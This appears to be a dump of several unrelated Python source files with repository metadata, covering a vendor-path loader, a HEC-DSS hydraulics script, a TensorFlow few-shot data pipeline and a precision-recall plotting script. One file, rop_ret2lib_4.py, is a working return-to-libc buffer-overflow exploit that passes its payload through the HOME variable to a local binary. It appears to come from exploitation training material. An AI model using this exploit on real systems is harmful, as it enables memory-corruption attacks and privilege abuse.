a06869c8b84d72266573e3eaa9e694e31582d97a
|
[] |
no_license
|
WaleedAlromaema/ItemFastAPI
|
9fef19e4f85193f6f17d18c0c393148f4fe510c6
|
9aa4779dc7d45c38bdd738d0d311d35f9042cd4c
|
refs/heads/master
| 2023-07-10T14:19:28.077497
| 2021-08-01T14:08:24
| 2021-08-01T14:08:24
| 391,641,951
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 305
|
py
|
import sys
try:
from pathlib import Path
except ImportError:
# noinspection PyUnresolvedReferences
from pathlib2 import Path
__version__ = "1.0.3"
__vendor_site__ = (Path(__file__).parent / "_vendor").as_posix()
if __vendor_site__ not in sys.path:
sys.path.insert(0, __vendor_site__)
|
[
"WalRoma@DESKTOP-TJNDUI1"
] |
WalRoma@DESKTOP-TJNDUI1
|
c2dfa472424134a661b3b929c19173f3627a69ca
|
50edc4d858276ae080a40561f68d64e2a9c8bb1d
|
/ExampleHydraulicComparison.py
|
0dcbeff5edf4853c8d47dac7b82b9c34d43c643f
|
[
"LicenseRef-scancode-warranty-disclaimer"
] |
no_license
|
iordach1/ICE-Coding
|
eef59eb043565c10208e197ce4109ba8ea86b11e
|
fb72df738e812f228fb4947f8fd3990754850c71
|
refs/heads/master
| 2020-03-28T03:54:50.491205
| 2018-08-16T17:40:40
| 2018-08-16T17:40:40
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,174
|
py
|
# Example Jython script demonstrating how DSS data can be accessed
# within execution of HEC-DSSVue and obtain hydraulic results from
# a HEC-RAS DSS file.
def GetMaxValueIndex(hydrograph):
# Gets the index of the entry in supplied
# array with the largest value
idx = 0
max = float(-sys.maxint)
for i in range (0, len(hydrograph.values)):
if (hydrograph.values[i] > max):
max = hydrograph.values[i]
idx = i
return idx
from hec.heclib.dss import HecDss
# obtain configuration details for HEC applications for
# python and jython scripts
import src.hecConfig
reload(src.hecConfig)
config = src.hecConfig.HecConfig()
dssFilePath=config.getRasProjectPath() + "/" + config.rasProjectName + ".dss"
dss = HecDss.open(dssFilePath)
hydraulicResults = {}
import pickle
dtf = open(config.getDataTransferFilePath(),'r+')
ditchNames = pickle.load(dtf)
dtf.close()
for ditchName in ditchNames:
# get some flow data from the DSS file - obtain peak values
dataPath = "/" + ditchName + "/FLOW/01DEC2006/1HOUR/" + config.rasPlanName + "/"
dataHydrograph = dss.get(dataPath.upper(), True); # true ensures entire time series is loaded
maxValueIdx = GetMaxValueIndex(dataHydrograph)
peakFlowValue = dataHydrograph.values[maxValueIdx]
peakFlowTime = dataHydrograph.times[maxValueIdx]
#print dataHydrograph.values
#print maxValueIdx
dataPath = "/" + ditchName + "/STAGE/01DEC2006/1HOUR/" + config.rasPlanName + "/"
dataHydrograph = dss.get(dataPath.upper(), True); # true ensures entire time series is loaded
peakStageValue = max(dataHydrograph.values)
hydraulicValues = {"peakFlowRate": peakFlowValue, "peakFlowTiming": peakFlowTime, "peakStage": peakStageValue}
hydraulicResults[ditchName] = hydraulicValues;
# Write results to a intermediate file that can be read within the calling
# Python script as communicaton between Jython called from HEC software and
# Python is somewhat limited
#print hydraulicResults
dtf = open(config.getDataTransferFilePath(),'w')
dtf.write(str(hydraulicResults))
dtf.close()
|
[
"noreply@github.com"
] |
iordach1.noreply@github.com
|
44ef8859d033e58a0a9a56f33e20576e31bb6668
|
85310673ac3e45956dfa904fe7fecf5d6c57bfee
|
/meta_dataset/data/pipeline.py
|
df807be9e188307ec47e3ac59bc901316c82b46e
|
[
"Apache-2.0"
] |
permissive
|
ebadrian/meta_dataset
|
c994f15a4cda2bf8e5b51539b174184a3269e5eb
|
bd40ec4486de165fa6f4ca9fe839e1f685a0ee27
|
refs/heads/main
| 2023-01-23T18:59:36.501160
| 2020-12-04T23:49:08
| 2020-12-04T23:49:08
| 318,241,469
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 25,065
|
py
|
# coding=utf-8
# Copyright 2020 The Meta-Dataset Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python2, python3
"""This module assembles full input data pipelines.
The whole pipeline incorporate (potentially) multiple Readers, the logic to
select between them, and the common logic to extract support / query sets if
needed, decode the example strings, and resize the images.
"""
# TODO(lamblinp): Organize the make_*_pipeline functions into classes, and
# make them output Batch or EpisodeDataset objects directly.
# TODO(lamblinp): Update variable names to be more consistent
# - target, class_idx, label
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
from absl import logging
import gin.tf
from meta_dataset import data
from meta_dataset.data import decoder
from meta_dataset.data import learning_spec
from meta_dataset.data import reader
from meta_dataset.data import sampling
from six.moves import zip
import tensorflow.compat.v1 as tf
def filter_dummy_examples(example_strings, class_ids):
"""Returns tensors with only actual examples, filtering out the dummy ones.
Actual examples are the first ones in the tensors, and followed by dummy ones,
indicated by negative class IDs.
Args:
example_strings: 1-D Tensor of dtype str, Example protocol buffers.
class_ids: 1-D Tensor of dtype int, class IDs (absolute wrt the original
dataset, except for negative ones, that indicate dummy examples).
"""
num_actual = tf.reduce_sum(tf.cast(class_ids >= 0, tf.int32))
actual_example_strings = example_strings[:num_actual]
actual_class_ids = class_ids[:num_actual]
return (actual_example_strings, actual_class_ids)
def log_data_augmentation(data_augmentation, name):
"""Logs the given data augmentation parameters for diagnostic purposes."""
if not data_augmentation:
logging.info('No data augmentation provided for %s', name)
else:
logging.info('%s augmentations:', name)
logging.info('enable_jitter: %s', data_augmentation.enable_jitter)
logging.info('jitter_amount: %d', data_augmentation.jitter_amount)
logging.info('enable_gaussian_noise: %s',
data_augmentation.enable_gaussian_noise)
logging.info('gaussian_noise_std: %s', data_augmentation.gaussian_noise_std)
def flush_and_chunk_episode(example_strings, class_ids, chunk_sizes):
"""Removes flushed examples from an episode and chunks it.
This function:
1) splits the batch of examples into a "flush" chunk and some number of
additional chunks (as determined by `chunk_sizes`),
2) throws away the "flush" chunk, and
3) removes the padded dummy examples from the additional chunks.
For example, in the context of few-shot learning, where episodes are composed
of a support set and a query set, `chunk_size = (150, 100, 50)` would be
interpreted as describing a "flush" chunk of size 150, a "support" chunk of
size 100, and a "query" chunk of size 50.
Args:
example_strings: 1-D Tensor of dtype str, tf.train.Example protocol buffers.
class_ids: 1-D Tensor of dtype int, class IDs (absolute wrt the original
dataset).
chunk_sizes: tuple of ints representing the sizes of the flush and
additional chunks.
Returns:
A tuple of episode chunks of the form `((chunk_0_example_strings,
chunk_0_class_ids), (chunk_1_example_strings, chunk_1_class_ids), ...)`.
"""
example_strings_chunks = tf.split(
example_strings, num_or_size_splits=chunk_sizes)[1:]
class_ids_chunks = tf.split(class_ids, num_or_size_splits=chunk_sizes)[1:]
return tuple(
filter_dummy_examples(strings, ids)
for strings, ids in zip(example_strings_chunks, class_ids_chunks))
@gin.configurable(whitelist=['support_decoder', 'query_decoder'])
def process_dumped_episode(support_strings, query_strings, image_size,
support_decoder, query_decoder):
"""Processes a dumped episode.
This function is almost like `process_episode()` function, except:
- It doesn't need to call flush_and_chunk_episode().
- And the labels are read from the tf.Example directly. We assume that
labels are already mapped in to [0, n_ways - 1].
Args:
support_strings: 1-D Tensor of dtype str, Example protocol buffers of
support set.
query_strings: 1-D Tensor of dtype str, Example protocol buffers of query
set.
image_size: int, desired image size used during decoding.
support_decoder: ImageDecoder, used to decode support set images.
query_decoder: ImageDecoder, used to decode query set images.
Returns:
support_images, support_labels, support_labels, query_images,
query_labels, query_labels: Tensors, batches of images, labels, and
labels, for the support and query sets (respectively). We return labels
twice since dumped datasets doesn't have (absolute) class IDs anymore.
"""
if isinstance(support_decoder, decoder.ImageDecoder):
log_data_augmentation(support_decoder.data_augmentation, 'support')
support_decoder.image_size = image_size
else:
raise TypeError('support_decoder type: %s is not ImageDecoder' %
type(support_decoder))
if isinstance(query_decoder, decoder.ImageDecoder):
log_data_augmentation(query_decoder.data_augmentation, 'query')
query_decoder.image_size = image_size
else:
raise TypeError('query_decoder type: %s is not ImageDecoder' %
type(query_decoder))
support_decoder.image_size = image_size
query_decoder.image_size = image_size
support_images, support_labels = tf.map_fn(
support_decoder.decode_with_label,
support_strings,
dtype=(support_decoder.out_type, tf.int32),
back_prop=False)
query_images, query_labels = tf.map_fn(
support_decoder.decode_with_label,
query_strings,
dtype=(support_decoder.out_type, tf.int32),
back_prop=False)
return (support_images, support_labels, support_labels, query_images,
query_labels, query_labels)
@gin.configurable(whitelist=['support_decoder', 'query_decoder'])
def process_episode(example_strings, class_ids, chunk_sizes, image_size,
support_decoder, query_decoder):
"""Processes an episode.
This function:
1) splits the batch of examples into "flush", "support", and "query" chunks,
2) throws away the "flush" chunk,
3) removes the padded dummy examples from the "support" and "query" chunks,
4) extracts and processes images out of the example strings, and
5) builds support and query targets (numbers from 0 to K-1 where K is the
number of classes in the episode) from the class IDs.
Args:
example_strings: 1-D Tensor of dtype str, tf.train.Example protocol buffers.
class_ids: 1-D Tensor of dtype int, class IDs (absolute wrt the original
dataset).
chunk_sizes: Tuple of ints representing the sizes the flush and additional
chunks.
image_size: int, desired image size used during decoding.
support_decoder: Decoder, used to decode support set images.
query_decoder: Decoder, used to decode query set images.
Returns:
support_images, support_labels, support_class_ids, query_images,
query_labels, query_class_ids: Tensors, batches of images, labels, and
(absolute) class IDs, for the support and query sets (respectively).
"""
# TODO(goroshin): Replace with `support_decoder.log_summary(name='support')`.
# TODO(goroshin): Eventually remove setting the image size here and pass it
# to the ImageDecoder constructor instead.
if isinstance(support_decoder, decoder.ImageDecoder):
log_data_augmentation(support_decoder.data_augmentation, 'support')
support_decoder.image_size = image_size
if isinstance(query_decoder, decoder.ImageDecoder):
log_data_augmentation(query_decoder.data_augmentation, 'query')
query_decoder.image_size = image_size
(support_strings, support_class_ids), (query_strings, query_class_ids) = \
flush_and_chunk_episode(example_strings, class_ids, chunk_sizes)
support_images = tf.map_fn(
support_decoder,
support_strings,
dtype=support_decoder.out_type,
back_prop=False)
query_images = tf.map_fn(
query_decoder,
query_strings,
dtype=query_decoder.out_type,
back_prop=False)
# Convert class IDs into labels in [0, num_ways).
_, support_labels = tf.unique(support_class_ids)
_, query_labels = tf.unique(query_class_ids)
return (support_images, support_labels, support_class_ids, query_images,
query_labels, query_class_ids)
@gin.configurable(whitelist=['batch_decoder'])
def process_batch(example_strings, class_ids, image_size, batch_decoder):
"""Processes a batch.
This function:
1) extracts and processes images out of the example strings.
2) builds targets from the class ID and offset.
Args:
example_strings: 1-D Tensor of dtype str, Example protocol buffers.
class_ids: 1-D Tensor of dtype int, class IDs (absolute wrt the original
dataset).
image_size: int, desired image size used during decoding.
batch_decoder: Decoder class instance for the batch.
Returns:
images, labels: Tensors, a batch of image and labels.
"""
# TODO(goroshin): Replace with `batch_decoder.log_summary(name='support')`.
if isinstance(batch_decoder, decoder.ImageDecoder):
log_data_augmentation(batch_decoder.data_augmentation, 'batch')
batch_decoder.image_size = image_size
images = tf.map_fn(
batch_decoder,
example_strings,
dtype=batch_decoder.out_type,
back_prop=False)
labels = class_ids
return (images, labels)
def make_one_source_episode_pipeline(dataset_spec,
use_dag_ontology,
use_bilevel_ontology,
split,
episode_descr_config,
pool=None,
shuffle_buffer_size=None,
read_buffer_size_bytes=None,
num_prefetch=0,
image_size=None,
num_to_take=None):
"""Returns a pipeline emitting data from one single source as Episodes.
Args:
dataset_spec: A DatasetSpecification object defining what to read from.
use_dag_ontology: Whether to use source's ontology in the form of a DAG to
sample episodes classes.
use_bilevel_ontology: Whether to use source's bilevel ontology (consisting
of superclasses and subclasses) to sample episode classes.
split: A learning_spec.Split object identifying the source (meta-)split.
episode_descr_config: An instance of EpisodeDescriptionConfig containing
parameters relating to sampling shots and ways for episodes.
pool: String (optional), for example-split datasets, which example split to
use ('train', 'valid', or 'test'), used at meta-test time only.
shuffle_buffer_size: int or None, shuffle buffer size for each Dataset.
read_buffer_size_bytes: int or None, buffer size for each TFRecordDataset.
num_prefetch: int, the number of examples to prefetch for each class of each
dataset. Prefetching occurs just after the class-specific Dataset object
is constructed. If < 1, no prefetching occurs.
image_size: int, desired image size used during decoding.
num_to_take: Optional, an int specifying a number of elements to pick from
each class' tfrecord. If specified, the available images of each class
will be restricted to that int. By default no restriction is applied and
all data is used.
Returns:
A Dataset instance that outputs tuples of fully-assembled and decoded
episodes zipped with the ID of their data source of origin.
"""
use_all_classes = False
if pool is not None:
if not data.POOL_SUPPORTED:
raise NotImplementedError('Example-level splits or pools not supported.')
if num_to_take is None:
num_to_take = -1
episode_reader = reader.EpisodeReader(dataset_spec, split,
shuffle_buffer_size,
read_buffer_size_bytes, num_prefetch,
num_to_take)
sampler = sampling.EpisodeDescriptionSampler(
episode_reader.dataset_spec,
split,
episode_descr_config,
pool=pool,
use_dag_hierarchy=use_dag_ontology,
use_bilevel_hierarchy=use_bilevel_ontology,
use_all_classes=use_all_classes)
dataset = episode_reader.create_dataset_input_pipeline(sampler, pool=pool)
# Episodes coming out of `dataset` contain flushed examples and are internally
# padded with dummy examples. `process_episode` discards flushed examples,
# splits the episode into support and query sets, removes the dummy examples
# and decodes the example strings.
chunk_sizes = sampler.compute_chunk_sizes()
map_fn = functools.partial(
process_episode, chunk_sizes=chunk_sizes, image_size=image_size)
dataset = dataset.map(map_fn)
# There is only one data source, so we know that all episodes belong to it,
# but for interface consistency, zip with a dataset identifying the source.
source_id_dataset = tf.data.Dataset.from_tensors(0).repeat()
dataset = tf.data.Dataset.zip((dataset, source_id_dataset))
# Overlap episode processing and training.
dataset = dataset.prefetch(1)
return dataset
def make_multisource_episode_pipeline(dataset_spec_list,
use_dag_ontology_list,
use_bilevel_ontology_list,
split,
episode_descr_config,
pool=None,
shuffle_buffer_size=None,
read_buffer_size_bytes=None,
num_prefetch=0,
image_size=None,
num_to_take=None):
"""Returns a pipeline emitting data from multiple sources as Episodes.
Each episode only contains data from one single source. For each episode, its
source is sampled uniformly across all sources.
Args:
dataset_spec_list: A list of DatasetSpecification, one for each source.
use_dag_ontology_list: A list of Booleans, one for each source: whether to
use that source's DAG-structured ontology to sample episode classes.
use_bilevel_ontology_list: A list of Booleans, one for each source: whether
to use that source's bi-level ontology to sample episode classes.
split: A learning_spec.Split object identifying the sources split. It is the
same for all datasets.
episode_descr_config: An instance of EpisodeDescriptionConfig containing
parameters relating to sampling shots and ways for episodes.
pool: String (optional), for example-split datasets, which example split to
use ('train', 'valid', or 'test'), used at meta-test time only.
shuffle_buffer_size: int or None, shuffle buffer size for each Dataset.
read_buffer_size_bytes: int or None, buffer size for each TFRecordDataset.
num_prefetch: int, the number of examples to prefetch for each class of each
dataset. Prefetching occurs just after the class-specific Dataset object
is constructed. If < 1, no prefetching occurs.
image_size: int, desired image size used during decoding.
num_to_take: Optional, a list specifying for each dataset the number of
examples per class to restrict to (for this given split). If provided, its
length must be the same as len(dataset_spec). If None, no restrictions are
applied to any dataset and all data per class is used.
Returns:
A Dataset instance that outputs tuples of fully-assembled and decoded
episodes zipped with the ID of their data source of origin.
"""
if pool is not None:
if not data.POOL_SUPPORTED:
raise NotImplementedError('Example-level splits or pools not supported.')
if num_to_take is not None and len(num_to_take) != len(dataset_spec_list):
raise ValueError('num_to_take does not have the same length as '
'dataset_spec_list.')
if num_to_take is None:
num_to_take = [-1] * len(dataset_spec_list)
sources = []
for source_id, (dataset_spec, use_dag_ontology, use_bilevel_ontology,
num_to_take_for_dataset) in enumerate(
zip(dataset_spec_list, use_dag_ontology_list,
use_bilevel_ontology_list, num_to_take)):
episode_reader = reader.EpisodeReader(dataset_spec, split,
shuffle_buffer_size,
read_buffer_size_bytes, num_prefetch,
num_to_take_for_dataset)
sampler = sampling.EpisodeDescriptionSampler(
episode_reader.dataset_spec,
split,
episode_descr_config,
pool=pool,
use_dag_hierarchy=use_dag_ontology,
use_bilevel_hierarchy=use_bilevel_ontology)
dataset = episode_reader.create_dataset_input_pipeline(sampler, pool=pool)
# Create a dataset to zip with the above for identifying the source.
source_id_dataset = tf.data.Dataset.from_tensors(source_id).repeat()
sources.append(tf.data.Dataset.zip((dataset, source_id_dataset)))
# Sample uniformly among sources.
dataset = tf.data.experimental.sample_from_datasets(sources)
# Episodes coming out of `dataset` contain flushed examples and are internally
# padded with dummy examples. `process_episode` discards flushed examples,
# splits the episode into support and query sets, removes the dummy examples
# and decodes the example strings.
chunk_sizes = sampler.compute_chunk_sizes()
def map_fn(episode, source_id):
return process_episode(
*episode, chunk_sizes=chunk_sizes, image_size=image_size), source_id
dataset = dataset.map(map_fn)
# Overlap episode processing and training.
dataset = dataset.prefetch(1)
return dataset
def make_one_source_batch_pipeline(dataset_spec,
split,
batch_size,
pool=None,
shuffle_buffer_size=None,
read_buffer_size_bytes=None,
num_prefetch=0,
image_size=None,
num_to_take=None):
"""Returns a pipeline emitting data from one single source as Batches.
Args:
dataset_spec: A DatasetSpecification object defining what to read from.
split: A learning_spec.Split object identifying the source split.
batch_size: An int representing the max number of examples in each batch.
pool: String (optional), for example-split datasets, which example split to
use ('valid', or 'test'), used at meta-test time only.
shuffle_buffer_size: int or None, number of examples in the buffer used for
shuffling the examples from different classes, while they are mixed
together. There is only one shuffling operation, not one per class.
read_buffer_size_bytes: int or None, buffer size for each TFRecordDataset.
num_prefetch: int, the number of examples to prefetch for each class of each
dataset. Prefetching occurs just after the class-specific Dataset object
is constructed. If < 1, no prefetching occurs.
image_size: int, desired image size used during decoding.
num_to_take: Optional, an int specifying a number of elements to pick from
each class' tfrecord. If specified, the available images of each class
will be restricted to that int. By default no restriction is applied and
all data is used.
Returns:
A Dataset instance that outputs decoded batches from all classes in the
split.
"""
if num_to_take is None:
num_to_take = -1
batch_reader = reader.BatchReader(dataset_spec, split, shuffle_buffer_size,
read_buffer_size_bytes, num_prefetch,
num_to_take)
dataset = batch_reader.create_dataset_input_pipeline(
batch_size=batch_size, pool=pool)
map_fn = functools.partial(process_batch, image_size=image_size)
dataset = dataset.map(map_fn)
# There is only one data source, so we know that all batches belong to it,
# but for interface consistency, zip with a dataset identifying the source.
source_id_dataset = tf.data.Dataset.from_tensors(0).repeat()
dataset = tf.data.Dataset.zip((dataset, source_id_dataset))
# Overlap episode processing and training.
dataset = dataset.prefetch(1)
return dataset
# TODO(lamblinp): Update this option's name
@gin.configurable('BatchSplitReaderGetReader', whitelist=['add_dataset_offset'])
def make_multisource_batch_pipeline(dataset_spec_list,
split,
batch_size,
add_dataset_offset,
pool=None,
shuffle_buffer_size=None,
read_buffer_size_bytes=None,
num_prefetch=0,
image_size=None,
num_to_take=None):
"""Returns a pipeline emitting data from multiple source as Batches.
Args:
dataset_spec_list: A list of DatasetSpecification, one for each source.
split: A learning_spec.Split object identifying the source split.
batch_size: An int representing the max number of examples in each batch.
add_dataset_offset: A Boolean, whether to add an offset to each dataset's
targets, so that each target is unique across all datasets.
pool: String (optional), for example-split datasets, which example split to
use ('valid', or 'test'), used at meta-test time only.
shuffle_buffer_size: int or None, number of examples in the buffer used for
shuffling the examples from different classes, while they are mixed
together. There is only one shuffling operation, not one per class.
read_buffer_size_bytes: int or None, buffer size for each TFRecordDataset.
num_prefetch: int, the number of examples to prefetch for each class of each
dataset. Prefetching occurs just after the class-specific Dataset object
is constructed. If < 1, no prefetching occurs.
image_size: int, desired image size used during decoding.
num_to_take: Optional, a list specifying for each dataset the number of
examples per class to restrict to (for this given split). If provided, its
length must be the same as len(dataset_spec). If None, no restrictions are
applied to any dataset and all data per class is used.
Returns:
A Dataset instance that outputs decoded batches from all classes in the
split.
"""
if num_to_take is not None and len(num_to_take) != len(dataset_spec_list):
raise ValueError('num_to_take does not have the same length as '
'dataset_spec_list.')
if num_to_take is None:
num_to_take = [-1] * len(dataset_spec_list)
sources = []
offset = 0
for source_id, (dataset_spec, num_to_take_for_dataset) in enumerate(
zip(dataset_spec_list, num_to_take)):
batch_reader = reader.BatchReader(dataset_spec, split, shuffle_buffer_size,
read_buffer_size_bytes, num_prefetch,
num_to_take_for_dataset)
dataset = batch_reader.create_dataset_input_pipeline(
batch_size=batch_size, pool=pool, offset=offset)
# Create a dataset to zip with the above for identifying the source.
source_id_dataset = tf.data.Dataset.from_tensors(source_id).repeat()
sources.append(tf.data.Dataset.zip((dataset, source_id_dataset)))
if add_dataset_offset:
offset += len(dataset_spec.get_classes(split))
# Sample uniformly among sources
dataset = tf.data.experimental.sample_from_datasets(sources)
def map_fn(batch, source_id):
return process_batch(*batch, image_size=image_size), source_id
dataset = dataset.map(map_fn)
# Overlap episode processing and training.
dataset = dataset.prefetch(1)
return dataset
|
[
"adrian.el_baz@ens-paris-saclay.fr"
] |
adrian.el_baz@ens-paris-saclay.fr
|
b854b2f33147ed15e806a984140b33a8a77e76fe
|
562384347373c3ae872a380e3d2363fbbbe0a5b3
|
/mpr_curves.py
|
c69ac35e2b899d12803af5570e2c60bf74299c74
|
[] |
no_license
|
XingCui666/scripts
|
22df26d072648557bdddc66c93d52d45bab64c7e
|
4f7488fd37ff0bf4f9bf78e93711a058885655c7
|
refs/heads/master
| 2022-04-14T15:46:24.407738
| 2020-03-24T04:30:53
| 2020-03-24T04:30:53
| 159,750,624
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,172
|
py
|
# Created by Kuan Li
import json
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
from tqdm import tqdm
import sys
import os
IOU_TH_50 = 0.5
IOU_THS = [i / 20 + 0.5 for i in range(9, -1, -1)]
class Dt:
def __init__(self, img_id, score, bbox, mode="mPR"):
"""
single dt
:param img_id:
:param score: a list of score
:param bbox: bbox
"""
self.img_id = img_id
self.score = score
self.bbox = bbox
if mode == "PR50":
self.is_match = False
else:
self.is_match = [False for _ in range(9, -1, -1)] # 0.95-->0.5
class Gt:
def __init__(self, img_id, bbox, mode="mPR"):
"""
a gt contains a list of gt bboxes
:param img_id:
:param bbox: a list of bboxes
"""
self.img_id = img_id
self.bbox = bbox
if mode == "PR50":
self.is_match = False
else:
self.is_match = [False for _ in range(9, -1, -1)] # 0.95-->0.5
def compute_iou(bbox1, bbox2):
x1, y1, w1, h1 = bbox1
x2, y2, w2, h2 = bbox2
s_sum = w1 * h1 + w2 * h2
left = max(x1, x2)
right = min(x1 + w1, x2 + w2)
top = max(y1, y2)
bottom = min(y1 + h1, y2 + h2)
if left >= right or top >= bottom:
return 0
intersect = (right - left) * (bottom - top)
return intersect / (s_sum - intersect)
def prepare_gt_and_dt(gt_path, dt_path, c_id):
"""
:param gt_path: gt path
:param dt_path: dt path
:param c_id: category_id
:return: gt dict and dt list
"""
with open(gt_path, "r") as f:
gt = json.load(f)
gt_objs = gt["annotations"]
gt_imgs = gt["images"]
gt_objs = [an for an in gt_objs if an["category_id"] == c_id]
gt_num = len(gt_objs)
gt_dic = dict() # key: image_id value: a list of Gt
for demo in gt_objs:
if demo["image_id"] in gt_dic:
tmp = Gt(img_id=demo["image_id"], bbox=demo["bbox"], mode=mode)
gt_dic[demo["image_id"]].append(tmp)
else:
gt_dic[demo["image_id"]] = [Gt(img_id=demo["image_id"], bbox=demo["bbox"], mode=mode)]
# TODO image_id_set should from "images", not "annotations", Done.
# image_id_set = gt_dic.keys() #
image_id_set = set([im["id"] for im in gt_imgs])
with open(dt_path, "r") as f:
dt_objs = json.load(f)
dt_objs = [demo for demo in dt_objs
if demo["category_id"] == c_id and demo["image_id"] in image_id_set]
dt_list = list()
for demo in dt_objs:
dt_list.append(Dt(img_id=demo["image_id"], score=demo["score"], bbox=demo["bbox"], mode=mode))
return gt_dic, dt_list, gt_num
def match_dt_2_gt(single_dt, gts, mode="mPR"):
"""
:param single_dt:
:param gts: a list of gt
:param mode:
:return:
"""
if mode == "PR50":
max_iou = 0
max_index = -1
for index, gt in enumerate(gts):
if not gt.is_match:
cur_iou = compute_iou(single_dt.bbox, gt.bbox)
if cur_iou >= IOU_TH_50 and max_iou < cur_iou:
max_index = index
max_iou = cur_iou
if max_index >= 0:
single_dt.is_match = True
gts[max_index].is_match = True
else:
for thres_index, thres in enumerate(IOU_THS): #first match high score
max_iou = 0
max_index = -1
for index, gt in enumerate(gts):
if not gt.is_match[thres_index]:
cur_iou = compute_iou(single_dt.bbox, gt.bbox)
if cur_iou >= thres and max_iou < cur_iou:
max_index = index
max_iou = cur_iou
if max_index >= 0:
single_dt.is_match[thres_index] = True
gts[max_index].is_match[thres_index] = True
def run_match(dt_list, gt_dict, mode):
"""
:param dt_list: a list of Dt class
:param gt_dict: key: image_id value: Gt class
:return:
"""
dt_list.sort(key=lambda x: x.score, reverse=True)
# sorted(dt_list, key=lambda x: x.score)
print("matching dt to gts...")
for single_dt in tqdm(dt_list):
img_id = single_dt.img_id
# TODO img_id is exists ? Done.
if img_id in gt_dic:
match_dt_2_gt(single_dt, gt_dict[img_id], mode=mode)
def get_recalls_and_precisions(dt_list, gt_num, mode="mPR"):
"""
recall: tp / gt_all; precision: tp/ dt_all
:param dt_list:
:param gt_num:
:return:
"""
if mode == "PR50":
is_match = [dt.is_match for dt in dt_list]
scores = [dt.score for dt in dt_list]
tp_list = []
cur_tp = 0
for match in is_match:
if match:
cur_tp += 1
tp_list.append(cur_tp)
recalls = [(tp / gt_num) * 100 for tp in tp_list]
precisions = [(tp / (index + 1)) * 100 for index, tp in enumerate(tp_list)]
return recalls, precisions, scores
else:
recalls_all = [0 for _ in dt_list]
precisions_all = [0 for _ in dt_list]
scores = [dt.score for dt in dt_list]
for index, thres in enumerate(IOU_THS):
is_match = [dt.is_match[index] for dt in dt_list]
tp_list = []
cur_tp = 0
for match in is_match:
if match:
cur_tp += 1
tp_list.append(cur_tp)
recalls = [(tp / gt_num) * 100 for tp in tp_list]
precisions = [(tp / (index + 1)) * 100 for index, tp in enumerate(tp_list)]
recalls_all = [recalls_all[i]+recalls[i] for i in range(len(dt_list))]
precisions_all = [precisions_all[i]+precisions[i] for i in range(len(dt_list))]
recalls_all = [recall/len(IOU_THS) for recall in recalls_all]
precisions_all = [precision/len(IOU_THS) for precision in precisions_all]
return recalls_all, precisions_all, scores
def get_thres_index(scores, score_thres):
indics = []
for thres in score_thres:
for index, score in enumerate(scores):
if score < thres:
indics.append(index)
break
return indics
if __name__ == '__main__':
gt_coco = sys.argv[1]
result1_json = sys.argv[2]
result2_json = sys.argv[3]
benchmark = sys.argv[4]
gt_path = gt_coco
dt_paths = [result1_json, result2_json]
colors = ['red', 'green', 'blue', "cyan", "brown", "black", "orange"] # default color
labels = ['v6.1_nnie', 'v6.2_nnie'] # same length as dt_paths
c_id = 1 # filter category_id
c_labels = {1: "body", 2: "head", 3: "face"}
mode = "mPR" # mPR or PR50
#score_thres = [0.8, 0.7, 0.6, 0.5, 0.4, 0.3, 0.2] # suggestion: descend, plot some key points
#score_marker = ["o", "v", "+", "s", ">", "*", "<"] # marker
score_thres = [0.8, 0.7, 0.6, 0.5] # suggestion: descend, plot some key points
score_marker = ["o", "v", "+", "s"] # marker
for index, dt_path in enumerate(dt_paths):
print("handling {} prlines...".format(labels[index]))
gt_dic, dt_list, gt_num = prepare_gt_and_dt(gt_path, dt_path, c_id)
run_match(dt_list, gt_dic, mode=mode)
recalls, precisions, scores = get_recalls_and_precisions(dt_list, gt_num, mode=mode)
plt.plot(recalls, precisions, linewidth=0.8, color=colors[index], label=labels[index])
indics = get_thres_index(scores, score_thres)
for i, num in enumerate(indics):
plt.scatter(recalls[num], precisions[num], c=colors[index], linewidths=1, marker=score_marker[i])
start_pos = (5, 75)
for i, score in enumerate(score_thres):
plt.text(start_pos[0], start_pos[1]-2*i, "score: {} --> {}".format(score, score_marker[i]))
plt.legend()
plt.xlabel("recalls")
plt.ylabel("precisions")
title = c_labels[c_id] if c_id in c_labels else "unknown"
des_saved = "./prlines_{}_test_{}.png".format(title, benchmark)
plt.title("{} {} on {}".format(title, mode, benchmark))
plt.savefig(des_saved)
plt.show()
print("done")
|
[
"xingcui@qa-gpu018.aibee.cn"
] |
xingcui@qa-gpu018.aibee.cn
|
c3ef23d87718434c242e7c55f33d4ccb0809bb27
|
77170eede81686cc4cac018e243b04d74c146ae6
|
/rop_ret2lib_4.py
|
64b7fdb79598929c51f1333fcbd3f1d116e8460c
|
[] |
no_license
|
Ravin-Academy/rop_ret2libc
|
76e1888608af3270a847e22f019c33a2eeefe7d1
|
88692860b0d601ab11eaad1743ef45a487dbe677
|
refs/heads/main
| 2023-02-20T03:43:55.360916
| 2021-01-23T16:00:14
| 2021-01-23T16:00:14
| 332,245,113
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 528
|
py
|
#!/usr/bin/python
from struct import *
import os
libc_binsh = pack("<I", 0xf7ef7aaa)
libc_printf = pack("<I", 0xf7dcb860)
libc_exit = pack("<I", 0xf7daaa60)
libc_popret = pack("<I", 0xf7e76671)
ret = pack("<I", 0x804900a)
rop_popret = pack("<I", 0x804901e)
buffer = ''
buffer += "A" * 312
# printf("/bin/sh")
buffer += libc_printf
buffer += libc_popret
buffer += pack("<I", 0xf7ef8b41)
# exit()
buffer += libc_exit
buffer += ret
PROGNAME = "./dav"
os.environ['HOME'] = buffer
os.execve(PROGNAME, [PROGNAME], os.environ)
|
[
"ramin.blackhat@gmail.com"
] |
ramin.blackhat@gmail.com
|
169f922fde12e42c0892becb0540abb35f3580b1
|
0fdac0d61352d3759cec291cababeef4c65c59f4
|
/mp3player.py
|
985cf2c87944d304a617b3c8dbd07a46c7d4d1c1
|
[] |
no_license
|
masterx2/VKD
|
